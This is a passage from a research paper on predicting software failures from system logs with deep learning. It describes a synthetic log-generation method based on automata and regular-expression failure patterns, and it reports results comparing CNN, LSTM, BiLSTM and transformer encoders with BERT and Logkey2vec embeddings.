accurate in the literature as discussed in SS 4.1. For BERT, we use the original pretrained model with 512 input tokens, where each token is represented as a 768-dimensional embedding vector. For Logkey2vec, we set the size of an embedding vector to be the same as BERT for a fair comparison. Also, Logkey2vec has an additional parameter: vocabulary size. We set it to 200, which is large enough for all datasets used in our evaluation. As for different DL encoders in RQ1 and RQ2, we consider four encoders that have been previously used in failure prediction and anomaly detection. We configured the encoders based on the recommendations reported in the literature (see SS 4.2 for further details). #### 5.2.2 Datasets with Different Characteristics As for the characteristics of datasets, we consider four factors that are expected to affect failure prediction performance: (1) dataset size (i.e., the number of logs in the dataset), (2) log sequence length (LSL) (i.e., the length of a log sequence in the dataset), (3) failure percentage (i.e., the percentage of log sequences with failure patterns in the dataset), and (4) failure pattern type (i.e., types of failures). The dataset size is important to investigate to assess the training efficiency of different DL models. To consider a wide range of dataset sizes while keeping the number of all combinations of the four factors tractable, we consider six levels that cover the range of real-world dataset sizes reported in a recent study [32]: 200, 500, 1 000, 5 000, 10 000, and 50 000. The LSL could affect failure prediction since a failure pattern that spans a longer log might be more difficult to predict correctly. Similar to observed lengths in real-world log sequences across publicly available datasets [32], we vary the maximum2 LSL across five levels: 20, 50, 100, 500, and 1 000. Footnote 2: We set the maximum LSL for to simplify control. The failure percentage determines the balance of classes in a dataset, which may affect the performance of DL models [27]. The training dataset is perfectly balanced at 50%. However, the failure percentage can be much less than 50% in practice, as observed in real-world datasets [33]. Therefore, we vary the failure percentage across six levels: 5%, 10%, 20%, 30%, 40%, and 50%. Regarding failure patterns, we aim to consider patterns with potential differences in terms of learning effectiveness. However, failure patterns defined in previous studies are too simple; for example, Das et al. [12] consider a specific, consecutive sequence of problematic log templates, called a "failure chain". But in practice, not all problematic log templates appear consecutively in a log. To address this, we use regular expressions to define failure patterns, allowing non-consecutive occurrences of problematic log templates. For example, a failure pattern "\(x(y|z)\)" indicates a pattern composed of two consecutive templates that starts with template \(x\) and ends with either template \(y\) or template \(z\). In addition, we consider two types of failure patterns (in the form of regular expressions), _Type-F_ and _Type-I_, depending on the cardinality of languages accepted by the regular expressions (_finite_ and _infinite_, respectively). This is because, if the cardinality of the language is finite, DL models might memorise (almost) all the finite instances (i.e., sequences of log templates) instead of learning the failure pattern. For example, the language defined by the regular expression "\(x(y|z)\)" is finite since there are only two template sequences (i.e., \(xy\) and \(xz\)) matching the expression "\(x(y|z)\). In this case, the two template sequences might appear in the training set, making it straightforward for DL models to simply memorise them. On the contrary, the language defined by the regular expression "\(x^{*}(y|z)\)" is infinite due to infinite template sequences that can match the sub-expression '\(x^{*}\)'; therefore simply memorising some of the infinitely many sequences matching "\(x^{*}(y|z)\)" would not be enough to achieve high failure prediction accuracy. To sum up, we consider 360 combinations (six dataset sizes, five maximum LSLs, six failure percentages, and two failure pattern types) in our evaluation. However, we could not use publicly available datasets for our experiments due to the following reasons. First, although He et al. [22] reported several datasets in their survey paper, they are mostly labeled based on the occurrence of error messages (e.g., log messages with the level of ERROR) instead of considering failure patterns (e.g., sequences of certain messages). Furthermore, there are no publicly available datasets covering all the combinations of the four factors defined above, making it impossible to thoroughly investigate their impact on failure prediction. To address this issue, we present a novel approach for synthetic log data generation in SS 5.3. #### 5.2.3 Failure Predictor Training and Testing We split each artificially-generated dataset into two disjoint sets, a training set and a test set, with a ratio of 80:20. Further, 20% of the training set is separated as a validation set, which is used for early stopping [44] during training to avoid over-fitting. For training failure predictors, to control the effect of highly imbalanced datasets, oversampling [52] is performed on the minority class (i.e., failure logs) to achieve a 50:50 ratio of normal to failure logs in the training dataset. For all the training datasets, we use the Adam optimizer [30] with a learning rate of 0.001 and the sparse categorical cross-entropy loss function [7] considering the Boolean output (i.e., failure or not) of the models. However, we use different batch sizes and numbers of epochs for datasets with different characteristics since they affect the convergence speed of the training error (particularly the dataset size, the maximum LSL, and the failure percentage). It would however be impractical to fine-tune the batch size and the number of epochs for 360 individual combinations. Therefore, based on our preliminary evaluation results, we use larger batch sizes with fewer epochs for larger datasets to keep the training time reasonable without significantly affecting training effectiveness. Specifically, we set the two hyperparameters as follows: * _Batch size_: By default, we set it to 10, 15, 20, 30, 150, and 300 for dataset sizes of 200, 500, 1 000, 5 000, 10 000, and 50 000, respectively. If the failure percentage is less than or equal to 30 (meaning more oversampling will happen to balance between normal and failure logs, increasing the training data size), then we increase the batch size to 10, 15, 30, 60, 300, and 600, respectively, to reduce training time. Furthermore, regardless of the failure percentage, we set the batch size to 5 if the maximum LSL is greater than or equal to 500 to prevent memory issues during training. * _Number of epochs_: By default, we set it to 20. If the maximum LSL is greater than or equal to 500, we reduce the number of epochs to 10, 10, 5, and 5 for dataset sizes of 1 000, 5 000, 10 000, and 50 000, respectively, to reduce training time. Table 2 summarises the above conditions, where FP is the failure percentage and MLSL refers to the maximum LSL. Once failure predictors are trained, we measure their accuracy on the corresponding test set in terms of precision, recall, and F1 score. We conducted all experiments with cloud computing environments provided by the Digital Research Alliance of Canada [16], on the Cedar cluster with a total of 94 528 CPU cores for computation and 1 352 GPU devices. ### Synthetic Data Generation In defining a set of factors, the methodology described in SS 5.2 makes it clear that there is a need for a mechanism that can generate datasets in a controlled, unbiased manner. For example, let us consider the factor of failure percentage (SS 5.2.2). Such a factor requires that one be able to control whether the log sequence being generated does indeed correspond to a failure; this would ultimately allow one to control the percentage of failure log sequences in a generated dataset. While, for smaller datasets, one could imagine manually choosing log sequences that represent both failures and normal behaviour, for larger datasets this is not feasible. When considering the other factors defined in SS 5.2, such as _LSL_, the case for a mechanism for automated, controlled generation of datasets becomes yet stronger. #### 5.3.1 Key Requirements We now describe a set of requirements that must be met by whatever approach we opt to take for generating datasets. In particular, our approach should: \begin{table} \begin{tabular}{c c c c c c c c} \hline \hline \multirow{2}{*}{**Hyperparameter**} & \multirow{2}{*}{**Condition**} & \multicolumn{5}{c}{**Dataset Size**} \\ & & 200 & 500 & 1 000 & 5 000 & 10 000 & 50 000 \\ \hline \multirow{3}{*}{Batch Size} & Default & 10 & 15 & 20 & 30 & 150 & 300 \\ & PF \(\leq 30\) & 10 & 15 & 30 & 60 & 300 & 600 \\ & MLSL \(\geq 500\)* & 5 & 5 & 5 & 5 & 5 & 5 \\ \hline \multirow{3}{*}{Number of Epochs} & Default & 20 & 20 & 20 & 20 & 20 & 20 \\ & MLSL \(\geq 500\) & 20 & 20 & 10 & 10 & 5 & 5 \\ \hline \hline \end{tabular} * This condition has higher priority than the other. \end{table} Table 2: Overview of Hyperparameter Setting R1 - Allow datasets' characteristics to be controlled.This requirement has already been described, but we summarise it here for completeness. We must be able to generate datasets for each combination of levels (of the factors defined in SS 5.2). Hence, our approach must allow us to choose a combination of levels, and generate a dataset accordingly. R2 - Be able to generate realistic datasets.A goal of this work is to present results that are applicable to real-world systems. Hence, we must require that the datasets with which we perform any evaluations reflect real-world system behaviours. R3 - Be able to generate datasets corresponding to a diverse set of systems.While we require that the datasets that we use be realistic, we must also ensure that the data generator can be applied to any system for which we have this automaton, rather than being limited to a single system. R4 - Avoid bias in the log sequences that make up the generated datasets.The previous requirement ensures that we do not introduce an approach that only works with one system. If our approach were to work solely with one system, we might say that it was biased at the _use case level_. The second kind of bias is at the log sequence-level. For example, for a given system, we wish to generate datasets containing log sequences that explore as much of the system's behaviour as possible (rather than being biased to a particular part of the system). #### 5.3.2 Automata for System Behaviour Our approach is based on finite-state automata. In particular, we use automata as approximate models of the behaviour of real-world systems. We refer to such automata as _behaviour models_, since they represent the computation performed by (i.e., behaviour of) some real-world system. We chose automata, or behaviour models, because some of our requirements are met immediately: R2.Existing tools [49, 54] allow one to infer behaviour models of real-world systems from collections of these systems' logs (in a process called _model inference_). Such models attach log messages to transitions, which is precisely what we need. Importantly, collections of logs used are unlabelled, meaning that the models that we get from these tools have no existing notion of normal behaviour or failures. R3.A result of meeting R2 is that one can easily infer behaviour models for multiple systems, provided the logs of those systems are accessible. The remaining sections will give the complete details of our automata-based data generation approach. In presenting these details, we will show how R1 and R4 are met. #### 5.3.3 Behaviour Models We take a behaviour model \(\mathcal{M}\) to be a deterministic finite-state automaton \(\langle Q,A,q_{0},\Sigma,\delta\rangle\), with symbols as defined in SS 2.1. A behaviour model has the particular characteristic that its alphabet \(\Sigma\) consists of _log template IDs_ (see SS 2.2). A direct consequence of this is that one can extract log sequences from behaviour models. In particular, if one considers a sequence of states (i.e., a path) \(q_{0},q_{i},q_{i+1},\ldots,q_{n}\) through the model, one can extract a sequence of log template IDs using the transition function \(\delta\). For example, if the first two states of the sequence are \(q_{0}\) and \(q_{i}\), then one need only find \(s\in\Sigma\) such that \(\delta(q_{0},s)=q_{i}\), i.e., it is possible to transition to \(q_{i}\) from \(q_{0}\) by observing \(s\). Finally, by replacing each log template ID in the resulting sequence with its corresponding log template, one obtains a _log sequence_ (see SS 2.2). These sequences can be divided into two categories: _failure log sequences_ and _normal_ log sequences. We describe failures using regular expressions. This is natural since behaviour models are finite state automata, and sets of paths through such automata can be described by regular expressions. Hence, we refer to such a regular expression as a _failure pattern_, and denote it by _fp_. By extension, for a given behaviour model \(\mathcal{M}\), we then denote by \(\mathsf{failurePatterns}(\mathcal{M})\) the set \(\{\!\textit{fp}_{1},\!\textit{fp}_{2},\ldots,\!\textit{fp}_{n}\}\) of failure patterns paired with the model \(\mathcal{M}\). Based on this, we characterise _failure log sequences_ as such: Failure log sequence.For a system whose behaviour is represented by a behaviour model \(\mathcal{M}\), we say that a log sequence represents a failure of the system whenever its sequence of log template IDs matches some failure pattern \(\textit{fp}\in\mathsf{failurePatterns}(\mathcal{M})\). Since this definition of failure log sequences essentially captures a subset of the possible paths through \(\mathcal{M}\), we define normal log sequences as those log sequences that are not failures: Normal log sequence.For a system whose behaviour is represented by a behaviour model \(\mathcal{M}\), we say that a log sequence \(l\) is normal, i.e., it represents normal behaviour, whenever \(l\in\mathcal{L}(\mathcal{M})\) and \(l\not\in\bigcup_{\textit{fp}\in\mathsf{failurePatterns}(\mathcal{M})}\mathcal{L }(\textit{fp})\) (we take \(\mathcal{L}(\mathcal{M})\) and \(\mathcal{L}(\textit{fp})\) to be as defined in SS 2.1). Hence, defining a normal log sequence requires that we refer to both the language of the model \(\mathcal{M}\), and the languages of all failure patterns associated with the model \(\mathcal{M}\). #### 5.3.4 Generating Log Sequences for Failures Let us suppose that we have inferred a model \(\mathcal{M}\) from the execution logs of some real-world system, and that we have defined the set \(\mathsf{failurePatterns}(\mathcal{M})\). Then we generate a failure log sequence that matches some \(\mathit{fp}\in\mathsf{failurePatterns}(\mathcal{M})\) by: 1. Computing a subset of \(\mathcal{L}(\mathit{fp})\). We do this by repeatedly generating single members of \(\mathcal{L}(\mathit{fp})\). Ultimately, this leads to the construction of a subset of \(\mathcal{L}(\mathit{fp})\). In practice, the Python package _exex_[51] can be used to generate random words from the language \(\mathcal{L}(\mathit{fp})\), so we invoke this library repeatedly. If the language of the regular expression is infinite, we can run _exex_ multiple times, each time generating a random string from the language. The number of runs is set based on our preliminary results with respect to the range of dataset size (2500 times for each failure pattern). Doing this, we generate a subset of \(\mathcal{L}(\mathit{fp})\). 2. Choosing at random a log sequence \(l\) from the random subset \(\mathcal{L}(\mathit{fp})\) computed in the previous step, with \(|l|\leq\mathit{mlsl}\) where \(mlsl\) refers to the value of maximum log sequence manipulated by LSL factor. (see SS 2.2) (_maximum LSL_, see SS 5.2). The Python package _random_[43] was employed for this. We highlight that failure patterns are designed so that there is always at least one failure pattern that can generate log sequences whose length falls within this bound. More details on this are provided in SS 5.4. For requirement R4, since our approach relies on random selection of log sequences from languages generated by the _exex_ tool, we highlight that the bias in our approach is subject to the implementation of both _exex_, and the Python package, _random_. _Exrex_ is a popular package for RegEx that has more than 100k monthly downloads. Its method for generating a random matching sequence is implemented by a random selection of choices on the RegEx's parse tree nodes. _Random_ package uses the Mersenne twister algorithm [37] to generate a uniform pseudo-random number used for random selection tasks. #### 5.3.5 Generating Log Sequences for Normal Behaviour While our approach defines how failures should look using a set of failure patterns \(\mathsf{failurePatterns}(\mathcal{M})\) defined over a model \(\mathcal{M}\), we have no such definition of how normal behaviour should look. Instead, this is left implicit in our behaviour model. However, based on the definition of normal log sequences given in SS 5.3.3, such log sequences can be randomly generated by performing random walks on behaviour models. This fact forms the basis of our approach to generating log sequences for normal behaviour. However, we must also address key issues: 1) the log sequences generated by our random walk must be of bounded length, and 2) the log sequences must also lack bias. There are two reasons for enforcing a bound on the length of log sequences: * Deep learning models (such as CNN) often accept inputs of limited size, so we have to ensure that the data we generate is compatible with the models we use. * One of the factors introduced in SS 5.2 is LSL, so we need to be able to control the length of log sequences that we generate. For bias, we have two sources: 1) bias to specific regions of the behavioral model, 2) bias to limited variation of LSL. We must minimise bias in both cases. Algorithm 1 gives our procedure for randomly generating a log sequence representing normal behaviour of a system. Algorithm 1 itself makes use of Algorithm 2. ``` Input:\(\mathcal{M}:\textit{behaviour model},\textit{mlsl}:\textit{int}\) Output:\(\textit{sequence}:\langle s_{1},s_{2},\dots,s_{n}\rangle\in\mathcal{L}(\mathcal{M})\) sequence: list \(\leftarrow\) filteredRandomWalk\((\mathcal{M},\textit{mlsl})\) whilesequence\(\in\bigcup_{\textit{fp}_{1}\in\text{failurePatterns}(\mathcal{M})}\mathcal{L}(\textit{fp}_{i})\)do sequence \(\leftarrow\) filteredRandomWalk\((\mathcal{M},\textit{mlsl})\) returnsequence ``` **Algorithm 1**_generateNormalSequence_ In particular, Algorithm 1 generates a normal log sequence by: 1. Generating a random log sequence by random walk (invoking Algorithm 2); 2. Looking for a failure pattern \(\mathit{fp}\in\mathsf{failurePatterns}(\mathcal{M})\) that matches the generated log sequence; 3. Repeating until a log sequence is generated that matches no failure pattern. Ultimately, Algorithm 1 is relatively lightweight; the weight of the work is performed by Algorithm 2, which we now describe in detail. The input arguments of Algorithm 2, which defines the procedure _filteredRandomWalk_, are a behaviour model \(\mathcal{M}\) and the maximum LSL, _mlsl_. The algorithm proceeds as follows. First, on line 1, we invoke the _calculateSValues_ function to compute a map that sends each state \(s\in Q\) of \(\mathcal{M}\) to the length of the shortest path from that state to an accepting state in \(A\). Next, on line 2, the _sequence_ variable is initialised to an empty sequence. As the algorithm progresses, this variable stores the generated sequence of log template IDs. To help with this, the variable _currentState_ is initialised to keep track of the state that the algorithm is _currently in_ during the walk of the behavioral model. Hence, this variable is initialised on line 4 as the initial state. The final step in the setup stage of our algorithm is to initialise the _maximumWalk_ variable, which serves as a counter to ensure the limit on the length of the generated log sequence (defined by _mlsl_) is respected. In the while loop (line 5), as long as the current state, _currentState_, is not yet an accepting state, the random walk transits from the current state to a new state. The set of possible transitions to take is computed by line 7, and stored in the variable _transitions_. Each transition is represented by a triple containing the starting state, the symbol to be observed, and the state resulting from observation of that symbol. Once this set has been computed, the algorithm performs a filtering step. In particular, in order to ensure that we respect the limit imposed on the length of the generated path by _mlsl_, we only consider transitions that lead to a state \(q^{\prime}\) such that \(\mathit{sValue}(q^{\prime})<\mathit{maximumWalk}\). The resulting list of valid options is then held in the variable _options_. Once the set _options_ has been computed, one transition \(\langle q,s,q^{\prime}\rangle\) will be chosen randomly from the set (line 13). This random choice eliminates bias because, each time we choose the next state to transition to, we do not favour any particular state (there is no weighting involved). This, extended over an entire path, means that we do not favour any particular region of a behaviour model. Now, from the randomly chosen transition \(\langle q,s,q^{\prime}\rangle\), the log template ID, \(s\), is added to _sequence_ (via sequence concatenation); _currentState_ is updated to the next state, \(q^{\prime}\); and _maximumWalk_ is decreased by one. Based on the condition of the while loop (line 5), when _currentState_\(\in A\) (i.e., the algorithm has reached an accepting state), the generated sequence _sequence_ is returned. While Algorithm 2 generates an unlabelled log sequence, Algorithm 1 generates a normal log sequence. To do this, it starts by generating a log sequence, by invoking the _filteredRandomWalk_ procedure (Algorithm 2). Since the sequence generated by Algorithm 2 is unlabelled, we must ensure that we do not generate a failure log sequence. We do this by checking whether the generated log sequence, _sequence_, belongs to the language of any failure pattern in failurePatterns(\(\mathcal{M}\)). If this is indeed the case, another sequence must be generated. This process is repeated (line 2) until the log sequence generated by the call of _filteredRandomWalk_ does not match any failure pattern in failurePatterns(\(\mathcal{M}\)). Once a failure log sequence has been generated, it is returned. We acknowledge that this process could be inefficient (since we are repeatedly generating log sequences until we get one with the characteristics that we need). However, we highlight that failure patterns describe only a small part of a behaviour model (this is essentially the assumption that failure is a relatively uncommon event in a real system). Hence, normal log sequences generated by random walks can be generated without too many repetitions. Correctness and lack of bias.We now provide a sketch proof of the correctness of Algorithm 2, along with an argument that the algorithm eliminates bias. To prove correctness, we show that, for a behaviour model \(\mathcal{M}\), the algorithm always generates a sequence of log template IDs that correspond to the transitions along a path through \(\mathcal{M}\). The algorithm begins at \(q_{0}\), by setting _currentState_ to \(q_{0}\) (line 4). From \(q_{0}\), and each successive state in the path, the possible next states must be adjacent to _currentState_ (line 7). Hence, the final value of _sequence_ after the while-loop at line 5 must be a sequence of log template IDs that correspond to the transitions along a path through \(\mathcal{M}\). Further, we must show that the sequence of log template IDs generated does not only correspond to a path through the behaviour model, but is of length at most _mlsl_ (one of the inputs of Algorithms 2 and 1). This is ensured by three factors: * The initialisation of the variable _maximumWalk_ on line 3. * The subsequent decrease by one of that variable each time a new log template ID is added to _sequence_. * Filtering of the possible next states in the random walk on line 9. In particular, on line 9 we ensure that, no matter which state we transition to, there will be a path that 1) leads to an accepting state; and 2) has length less than _maximumWalk_. Finally, bias is minimised by two factors: * On line 13, we choose a random next state. Of course, here we rely on the implementation of random choice that we use. * On line 9, while we respect the maximum length of the sequence of log template IDs, we do not enforce that we reach this maximum. Hence, we can generate paths of various lengths. Example.To demonstrate Algorithm 2, we now perform a random walk over the behaviour model shown in Figure 3. We start with the behaviour model's starting state, \(q_{0}\), with _mlsl_ set to 5. Since \(q_{0}\not\in A\), we can execute the body of the while-loop at line 5. Hence, we can determine the set _transitions_ of transitions leading out of \(q_{0}\): \[\{\langle q_{0},a,q_{2}\rangle,\langle q_{0},b,q_{2}\rangle,\langle q_{0},c,q _{1}\rangle,\langle q_{0},d,q_{1}\rangle\}.\] Our next step is to filter these transitions to ensure that the state that we move to allows us to reach an accepting state within _maximumWalk_ states. To do this, we filter the set _transitions_ with respect to the values in Table 3. After this filtering step, the resulting set, _options_, is \[\{\langle q_{0},a,q_{2}\rangle,\langle q_{0},b,q_{2}\rangle,\langle q_{0},c,q _{1}\rangle,\langle q_{0},d,q_{1}\rangle\}.\] All states in _transitions_ are safe to transition to. To take one transition as an example, \(\langle q_{0},a,q_{2}\rangle\) has _sValue\((q_{2})=1<5\)_, so is kept. Once we have computed _options_, we choose a transition at random. In this case, we arrive at \(\langle q_{0},c,q_{1}\rangle\), meaning that we set _currentState_ to \(q_{1}\). Before we progress to the next iteration of the main loop of the algorithm, we also decrease _maximumWalk_. This means that, during the next iteration of the while loop, we will be able to choose transitions leading to states from which an accepting state must be reachable within less than 4 states. Indeed, from \(q_{1}\), there are four transitions, for which we compute the set \[\{\langle q_{1},a,q_{0}\rangle,\langle q_{1},b,q_{1}\rangle,\langle q_{1},c,q _{3}\rangle,\langle q_{1},d,q_{3}\rangle\}.\] From this set, each possible next state has _sValue_ greater than _maximumWalk_ (equal to 4), so all of them would be possible options for the next step. Suppose that we choose \(\langle q_{1},a,q_{0}\rangle\) at random. Hence, \(q_{0}\) is the next state and \(a\) is added to the _sequence_. For the remaining steps, a possible run of the procedure could yield the sequence of transitions \(\langle q_{0},b,q_{2}\rangle\), \(\langle q_{2},d,q_{1}\rangle\), \(\langle q_{1},d,q_{3}\rangle\), in which case the final sequence of log template IDs would be \(c,a,b,d,d\). #### 5.3.6 A summary of requirements met We now describe how the approach that we have described meets the remaining requirements set out in SS 5.3.1. \begin{table} \begin{tabular}{|c|c|} \hline **state** & **s value** \\ \hline \hline \(q_{0}\) & 2 \\ \(q_{1}\) & 1 \\ \(q_{2}\) & 1 \\ \(q_{3}\) & 0 \\ \hline \end{tabular} \end{table} Table 3: s values for each state R1 is met because we have two procedures for generating failure log sequences (SS 5.3.4) and normal log sequences (SS 5.3.5). By having these procedures, we can precisely control the number of each type of log sequence in our dataset. R4 is met because of the randomisation used in our data generation algorithm, described in Sections 5.3.4 and 5.3.5. ### Experimental Setting for Syntactic Data Generation To generate diverse log datasets with the characteristics described in SS 5.2.2, using the syntactic data generation approach described in SS 5.3, we need two main artifacts: _behavior models_ and _failure patterns_. #### 5.4.1 Behavior Models Regarding behavior models, as discussed in SS 5.3.2, we can infer accurate models of real-world systems from their execution logs using state-of-the-art model inference tools, i.e., MINT [54] and PRINS [49]. Among the potential models we could generate using the replication package of these tools, we choose models that satisfy the following criteria based on the model size and inference time reported by Shin et al. [49]: 1. The model should be able to generate (accept) a log with a maximum length of 20 (i.e., the shortest maximum LSL defined in SS 5.2.2; 2. Since there is no straightforward way of automatically generating failure patterns for individual behavior models considering the two failure pattern types, we had to manually generate failure patterns (detailed in SS 5.4.2). Therefore, the size of the model should be amenable to manually generating failure patterns by taking into account the model structure (i.e., the number of all states and transitions is less than \(1\,000\)); Figure 3: An example of a behaviour model. 3. The model inference time should be less than 1 hour; and 4. If we can use both PRINS and MINT to infer a model that satisfies the above criteria for the same logs, then we use PRINS, which is much faster than MINT in general, to infer the model. As a result, we use the following three models as our behavior models: \(\mathcal{M}_{1}\) (generated from NGLClient logs using PRINS), \(\mathcal{M}_{2}\) (generated from HDFS logs using MINT), and \(\mathcal{M}_{3}\) (generated from Linux logs using MINT). Table 4 reports about the size of the three behavior models in terms of the number of templates (#Templates), states (#States), and transitions (#Transitions). It additionally shows the number of states in the largest strongly connected component (#States-NSCC) [2], which indicates the complexity of a behavior model (the higher, the more complex). #### 5.4.2 Failure Patterns Regarding failure patterns, recall a failure pattern _fp_ of a behavior model \(\mathcal{M}\) is a regular expression where \(\mathcal{L}(\textit{fp})\subset\mathcal{L}(\mathcal{M})\), as described in SS 5.3.3. Also, note that we need two types of failure patterns (_Type-F_ and _Type-I_), and the failure log sequences generated from the failure patterns must satisfy the dataset characteristics (especially the maximum LSL) defined in SS 5.2.2. To manually create such failure patterns (regular expressions) in an unbiased way, we used the following steps for each behavior model and failure pattern type: 1. We randomly choose the alphabet size of a regular expression and the number of operators (i.e., alternations and Kleene stars; the latter is not used for _Type-F_). 2. Using the chosen random values, for a given behavior model \(\mathcal{M}\), we manually create a failure pattern (regular expression) _fp_ to satisfy \(\mathcal{L}(\textit{fp})\subset\mathcal{L}(\mathcal{M})\) and the maximum LSL within the time limit of 1 hour; if we fail (e.g., if the shortest log in \(\mathcal{L}(\textit{fp})\) is longer than the maximum LSL of 20), we go back and restart Step 1. 3. We repeat Steps 1 and 2 ten times to generate ten failure patterns and then randomly select three out of them. As a result, we use 18 failure patterns (i.e., 3 failure patterns \(\times\) 3 behavior models \(\times\) 2 failure pattern types) for synthetic data generation. \begin{table} \begin{tabular}{c r r r r} \hline \hline **Model** & **\#Templates** & **\#States** & **\#Transitions** & **\#States-NSCC** \\ \hline \(\mathcal{M}_{1}\) & 70 & 154 & 195 & 5 \\ \(\mathcal{M}_{2}\) & 16 & 91 & 189 & 72 \\ \(\mathcal{M}_{3}\) & 115 & 350 & 486 & 331 \\ \hline \hline \end{tabular} \end{table} Table 4: Overview of Behavioural models ## 6 Results This section presents the results of RQ1 (DL encoders), RQ2 (log sequence embedding strategies), and RQ3 (dataset characteristics), respectively. ### RQ1: DL Encoders Figure 4 shows boxplots of the failure prediction accuracy (F1 score) for different DL encoders (i.e., transformer-based, LSTM-based, CNN-based, and BiLSTM-based models) on the datasets generated by different behavior models (i.e., M1, M2, and M3). Each box is generated based on \(360\times 2\) data points since we have 360 combinations of dataset characteristics and two log sequence embedding strategies. In each box, a triangle indicates the mean value. Overall, the CNN-based model achieves the best performance in terms of F1 score for all behavior models. It has the highest mean values with the smallest interquartile ranges (IQRs), meaning that the CNN-based model consistently works very well regardless of dataset characteristics and log sequence embedding strategies. The BiLSTM-based model also shows promising results. However, the CNN-based model's results are significantly higher for all the behavioral models (paired t-test p-values!! 0.001). In contrast, the LSTM-based and transformer-based models show poor results (low F1 score on average with very large IQRs). These patterns are independent from both the embedding strategy and the model. Further, the large variance for LSTM-based and transformer-based models suggests that these models are very sensitive to the dataset characteristics. The poor performance of the transformer-based encoder can be explained by the fact that the transformer blocks in the encoder are data-demanding (i.e., Figure 4: Failure prediction accuracy for different DL encoders. The triangles additionally indicate mean values. requiring much training data). When the dataset size is small (below \(1\,000\)), the data-demanding transformer blocks are not well-trained, leading to poor performance. This limitation is thoroughly discussed in the literature [57]. The LSTM-based encoder, on the other hand, has two simple layers of LSTM units. Recall that an LSTM model sequentially processes a given log sequence (i.e., a sequence of templates), template by template. Although LSTM attempts to address the long-term dependency problem of RNN by having a _forget gate_ (see SS 2.4.1), it is still a recurrent network that has difficulties to remember a long input sequence [34]. For this reason, since our log datasets contain long log sequences (up to a length of \(1\,000\)), the LSTM-based encoder did not work well. The BiLSTM-based encoder involves LSTM units and therefore has the weakness mentioned above. However, for BiLSTM, the input sequence flows in both directions in the network, utilizing information from both sides. Furthermore, it is enhanced by the attention mechanism that assigns more weight to parts of the input which are associated with the failure pattern [53]. Thus, the BiLSTM-based encoder can more easily learn the impact of different log templates on the classification results. However, the attention layer is more data-demanding than the convolution layers (see SS 4.2) in the CNN-based encoder, and this explains why the BiLSTM-based encoder does not outperform the CNN-based encoder. The high performance of the BiLSTM-based and CNN-based encoders can be explained by the number of trainable parameters; for these two encoders, unlike the transformer-based and LSTM-based ones, the number of trainable parameters increases as the input sequences get longer. The larger number of parameters makes the encoders more robust to longer input log sequences. Furthermore, CNN additionally processes spatial information (i.e., conjunctive relationships among templates) using multiple filters with different kernel sizes [20], which makes failure prediction more accurate even when the input size (sequence length) is large. These characteristics make the CNN-based encoder the best choice in our application context. The answer to RQ1 is that the CNN-based encoder significantly outperforms the other encoders regardless of dataset characteristics and log sequence embedding strategies. ### RQ2: Log Sequence Embedding Strategies Figure 5 shows the boxplots of the failure prediction accuracy (F1 score) for the different log sequence embedding strategies considered in this study (i.e., BERT and Logkey2vec) on the datasets generated by the three behaviour models (M1, M2, and M3). Each box is generated based on \(360\times 4\) data points since we have 360 combinations of dataset characteristics and four DL encoders. Similar to Figure 4, the triangle in each box indicates the mean value. We now inspect the plots shown inside with the aim of answering our research questions. The plots based on precision and recall are excluded since they draw similar conclusions. Figure 5 shows that the BERT embedding strategy performs better than Logkey2vec for all behaviour models in terms of mean values and smaller IQRs. This means that, on average, for all DL encoders, the semantic-aware log sequence embedding using BERT fares better than the embedding that solely relies on log template IDs using Logkey2vec, which does not account for the semantic information of templates. To better understand the impact of log sequence embedding strategies on the performance of different DL encoders, we additionally performed paired t-tests to compare the F1 score distributions of BERT and Logkey2vec for each of the four DL encoders. Table 5 reports the statistical test results. For example, the low p-value in column _M2_ and row _CNN_ indicates that Logkey2vec is significantly better than BERT when the CNN-based encoder is used on datasets generated by the M2 behaviour model. \begin{table} \begin{tabular}{c r r r r} \hline \hline **DL encoder** & **M1** & **M2** & **M3** & **All** \\ \hline CNN & 0.572 & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) \\ BiLSTM & 0.001 & 0.001 & 0.018 & \(\ll 0.001\) \\ transformer & \(\ll 0.001\) & 0.505 & 0.032 & \(\ll 0.001\) \\ LSTM & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) \\ \hline **All** & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) \\ \hline \hline \end{tabular} \end{table} Table 5: Paired t-test results (p-values). A level of significance \(\alpha=0.01\) is used. A gray background indicates that Logkey2vec outperforms BERT; otherwise, BERT outperforms Logkey2vec. Figure 5: Failure prediction accuracy for different log sequence embedding strategies. The triangles additionally indicate mean values. Interestingly, BERT is statistically better than or equal to Logkey2vec for all DL encoders except the CNN-based encoder (i.e., the best-performing DL encoder as investigated in SS 6.1), a trend that is clearly observable in Figure 6, depicting the F1 score distributions of BERT and Logkey2vec for the CNN encoder. In other words, the combination of the CNN-based encoder and the Logkey2vec embedding strategy is the best combination of DL encoders and log sequence embedding strategies. Although, in contrast to BERT, Logkey2vec does not consider the semantic information of log templates, it accounts for the order of template IDs in each log sequence. Furthermore, Logkey2vec is trained together with the DL encoder, while BERT is pre-trained independently from the DL encoder. We suspect that such characteristics of Logkey2vec play a positive role in combination with the CNN-based encoder. We note that BERT is still an attractive strategy for log sequence embedding when any other encoder than CNN is used. Although BERT is considerably larger than Logkey2vec in terms of parameters, using BERT does not require significantly more time and resources than Logkey2vec since BERT minimises repeated calculations by mapping each log template ID to its corresponding BERT embedding vector. The answer to RQ2 is that the performance of the log sequence embedding strategies varies depending on the DL encoders used. Although BERT outperforms Logkey2vec overall across all encoders, Logkey2vec outperforms BERT when the CNN-based encoder is used. Figure 6: Failure prediction accuracy of CNN-based model for different log sequence embedding strategies; triangles indicate mean values. Figure 7: Failure prediction accuracy of the CNN-based encoder with Logkey2vec for different dataset characteristics ### RQ3: Dataset Characteristics Figure 7 shows the distributions of F1 scores according to different dataset characteristic values. We only use the data generated by the best combination of the DL encoder and the log sequence embedding strategy, i.e., the CNN-based encoder and Logkey2vec, based on the results from RQ1 and RQ2. Below, we discuss how the failure prediction accuracy of the best-performing combination varies with each of the dataset characteristics. In Figure 7(a), we can see the impact of dataset size on the failure prediction accuracy; it is clear that accuracy decreases with smaller datasets, regardless of the behaviour models used to generate the log datasets. For example, when dataset size is 200, accuracy goes down below 0.7 in the worst case, whereas it always stays very close to 1.0 when dataset size is above or equal to 5 000. Since larger datasets imply more training data, this result is intuitive. Figure 7(b) depicts the impact of maximum LSL values (_mlsl_) on the failure prediction accuracy. Compared to the impact of data set size, we can see that the impact of log sequence length is relatively small. This implies that the 